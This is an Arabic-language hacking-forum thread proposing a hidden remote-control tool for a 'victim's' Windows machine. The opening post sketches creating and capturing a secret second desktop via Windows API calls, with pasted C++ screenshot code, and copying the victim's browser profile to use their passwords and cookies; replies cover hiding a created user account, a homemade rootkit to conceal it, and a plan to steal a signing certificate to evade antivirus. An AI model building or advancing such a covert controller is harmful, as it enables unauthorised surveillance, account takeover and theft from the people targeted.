فكرة لصنع متحكم خفي بجهاز الضحية hidden rdp

تم تحميل الصفحة في 1,7111792 ثانية
فكرة لصنع متحكم خفي بجهاز الضحية hidden rdp
إنضم
27 يناير 2018
المشاركات
582
الإعجابات
528
النقاط
93
هذه فكرة بسيطة لمحاكاة rdp خفي علي جهاز الضحية

وجدت سابقا طريقة عن طريق عمل user وإخفاؤه من الريجستري لكن يمكن كشفه في مدير المهام

هذه الفكرة عبارة عن إنشاء سطح مكتب آخر وتصويره والتحكم فيه عن بعد بمعرفة أبعاده الحقيقية والمقياس الموجود في المتحكم علي جهاز الهاكر

في البداية يصنع سطح مكتب آخر باستخدام
CreateDesktop
هذه الدالة ستعطيك مقبضا للسطح
وبعدها تستخدم
SwitchDesktop
للانتقال لسطح المكتب الآخر مع تخزين السطح القديم في متغير
بعدها
GetDesktopWindow
للحصول علي مقبض لرسم سطح المكتب
ومن ثم رسم السطح باستخدام هذه الدالة (منقولة)

C++:
void ScreenShot(char*BmpName)
{
    HWND DesktopHwnd = GetDesktopWindow();
    RECT DesktopParams;
    HDC DevC = GetDC(DesktopHwnd);
    GetWindowRect(DesktopHwnd,&DesktopParams);
    DWORD Width = DesktopParams.right - DesktopParams.left;
    DWORD Height = DesktopParams.bottom - DesktopParams.top;

    DWORD FileSize = sizeof(BITMAPFILEHEADER)+sizeof(BITMAPINFOHEADER)+(sizeof(RGBTRIPLE)+1*(Width*Height*4));
    char *BmpFileData = (char*)GlobalAlloc(0x0040,FileSize);

    PBITMAPFILEHEADER BFileHeader = (PBITMAPFILEHEADER)BmpFileData;
    PBITMAPINFOHEADER  BInfoHeader = (PBITMAPINFOHEADER)&BmpFileData[sizeof(BITMAPFILEHEADER)];

    BFileHeader->bfType = 0x4D42; // BM
    BFileHeader->bfSize = sizeof(BITMAPFILEHEADER);
    BFileHeader->bfOffBits = sizeof(BITMAPFILEHEADER)+sizeof(BITMAPINFOHEADER);

    BInfoHeader->biSize = sizeof(BITMAPINFOHEADER);
    BInfoHeader->biPlanes = 1;
    BInfoHeader->biBitCount = 24;
    BInfoHeader->biCompression = BI_RGB;
    BInfoHeader->biHeight = Height;
    BInfoHeader->biWidth = Width;

    RGBTRIPLE *Image = (RGBTRIPLE*)&BmpFileData[sizeof(BITMAPFILEHEADER)+sizeof(BITMAPINFOHEADER)];
    RGBTRIPLE color;
    
    HDC CaptureDC = CreateCompatibleDC(DevC);
    HBITMAP CaptureBitmap = CreateCompatibleBitmap(DevC,Width,Height);
    SelectObject(CaptureDC,CaptureBitmap);
    BitBlt(CaptureDC,0,0,Width,Height,DevC,0,0,SRCCOPY|CAPTUREBLT);
    GetDIBits(CaptureDC,CaptureBitmap,0,Height,Image,(LPBITMAPINFO)BInfoHeader, DIB_RGB_COLORS);

    DWORD Junk;
    HANDLE FH = CreateFileA(BmpName,GENERIC_WRITE,FILE_SHARE_WRITE,0,CREATE_ALWAYS,0,0);
    WriteFile(FH,BmpFileData,FileSize,&Junk,0);
    CloseHandle(FH);
        GlobalFree(BmpFileData);
}
يمكن بدلا من وضع الصورة في ملف إرسالها إلي جهاز الهاكر حيث يستقبلها العارض ويقوم بدور المتحكم

ولتشغيل برامج علي سطح المكتب الجديد تستخدم
CreateProcess
مع تعديل lpDesktop في بناء STARTUPINFO لتشير إلي اسم سطح المكتب الذي تم صنعه

وعند تشغيل المتصفحات إذا أردت أن يكون معك كلمات مرور وكوكيز ومكان الضحية ولا يعرف المواقع التي تصفحتها يمكنك نسخ بروفايل المتصفح إلي مكان آخر وتحديد مكان البروفايل في سطر أوامر المتصفح
 

dasktop

Beginner Developer
rank
إنضم
8 يناير 2015
المشاركات
119
الإعجابات
104
النقاط
43
الإقامة
KSA
فكرة ممتازة
وتحتاج خبرة في مجال c++ للعمل الصامت

لاكن هنا في الديف جميع المواضيع مثل + و - كل شي لابد من وجود شي مضاد له مهما كان

ف الافضل ان يكون الافكار العملاقه بسرية تامه
 
إنضم
27 يناير 2018
المشاركات
582
الإعجابات
528
النقاط
93
فكرة ممتازة
وتحتاج خبرة في مجال c++ للعمل الصامت


لاكن هنا في الديف جميع المواضيع مثل + و - كل شي لابد من وجود شي مضاد له مهما كان

ف الافضل ان يكون الافكار العملاقه بسرية تامه
ليست فكرة متقدمة أبدا هذه ميزات يتيحها الويندوز لمراقبة سطح المكتب الخاص بك
هناك برامج كثيرة تنشئ سطح مكتب خاص بها وتحتاج لمراقبته
 
إنضم
27 يناير 2018
المشاركات
582
الإعجابات
528
النقاط
93
ممكنة مشاركة طريقة انشاء ال Registry و أخفائه ?
طريقة إخفاء مستخدم من الريجستري

Hide User Accounts on Windows 7 Logon

How to hide specific user accounts from the sign-in screen on Windows 10

ولإضافة يوزر نستخدم
NetUserAdd

NetUserAdd function

هذه الطريقة عيبها كما قلت أنه يمكن معرفة اليوزر من العمليات التي تعمل عليه

لكن وفقني الله للحل
سأستخدم المتخفي عن النظام user mode rootkit الذي صنعته من قريب لإخفاء كل العمليات في اليوزر الجديد وإخفاء أي أثر لليوزر الجديد عن عمليات اليوزر الأصلي وإخفاء ملفات اليوزر الجديد وبروفايله من القرص c

وبعد انتهاء السنة الدراسية سأحاول سرقة شهادة والبدء في دراسة ddk لعمل درايفر ليصبح الروتكت محمي حتي من الكيرنيل والأنتي فيرس
 
إنضم
27 مايو 2014
المشاركات
297
الإعجابات
391
النقاط
63
العمر
19
الإقامة
Marruecos
طريقة إخفاء مستخدم من الريجستري

Hide User Accounts on Windows 7 Logon

How to hide specific user accounts from the sign-in screen on Windows 10

ولإضافة يوزر نستخدم
NetUserAdd

NetUserAdd function

هذه الطريقة عيبها كما قلت أنه يمكن معرفة اليوزر من العمليات التي تعمل عليه

لكن وفقني الله للحل
سأستخدم المتخفي عن النظام user mode rootkit الذي صنعته من قريب لإخفاء كل العمليات في اليوزر الجديد وإخفاء أي أثر لليوزر الجديد عن عمليات اليوزر الأصلي وإخفاء ملفات اليوزر الجديد وبروفايله من القرص c

وبعد انتهاء السنة الدراسية سأحاول سرقة شهادة والبدء في دراسة ddk لعمل درايفر ليصبح الروتكت محمي حتي من الكيرنيل والأنتي فيرس
هل يمكنك مشاركة سورس كود ال rootkit أن امكن ?
 

الأعضاء النشطين حاليآ الذين يشاهدون هذا الموضوع (1 عضو و 0 ضيف)

خيارات الاستايل

نوع الخط
مودك
اخفاء السايدر بار OFF
توسيط المنتدى OFF
فصل الأقسام OFF
الأقسام الفرعية OFF
عرض المشاركات
حجم الخط
معلومات العضو OFF
إخفاء التوقيع OFF

إرجاع خيارات الإستايل